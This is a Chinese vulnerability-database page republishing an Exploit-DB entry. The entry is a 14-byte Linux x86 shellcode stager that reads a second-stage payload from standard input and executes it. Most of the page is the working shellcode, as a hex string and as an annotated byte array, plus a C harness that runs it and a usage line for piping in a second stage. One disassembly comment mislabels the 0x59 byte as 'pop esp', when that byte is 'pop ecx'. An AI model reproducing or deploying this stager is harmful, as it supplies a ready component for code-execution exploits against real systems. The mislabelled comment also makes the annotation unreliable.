Linux/x86 - Stager Reads Second Stage From STDIN Shellcode (14 bytes)

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1057089 漏洞类型
发布时间 2009-01-01 更新时间 2009-01-01
CVE编号 N/A CNNVD-ID N/A
漏洞平台 Linux_x86 CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/43719
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/*
 * (linux/x86) stagger that reads second stage shellcode (127 bytes maximum) from stdin - 14 bytes
 * _fkz / twitter: @_fkz 
 *
 * sc = "\x6A\x7F\x5A\x54\x59\x31\xDB\x6A\x03\x58\xCD\x80\x51\xC3"
 * 
 * Example of use:
 * (echo -ne "\xseconde stage shellcode\x"; cat) | ./stager
 */
 
 char shellcode[] = 
 
 		"\x6A\x7F"		//	push	byte	+0x7F
 		"\x5A"			//	pop		edx	
 		"\x54"			//	push	esp
 		"\x59"			//	pop		esp
 		"\x31\xDB"		//	xor		ebx,ebx
 		"\x6A\x03"		//	push	byte	+0x3
 		"\x58"			//	pop		eax
 		"\xCD\x80"		//	int		0x80
 		"\x51"			//	push	ecx
 		"\xC3";			//	ret

int main(int argc, char *argv[])
{
	void (*execsh)() = (void *)&shellcode;
	execsh();
	return 0;
}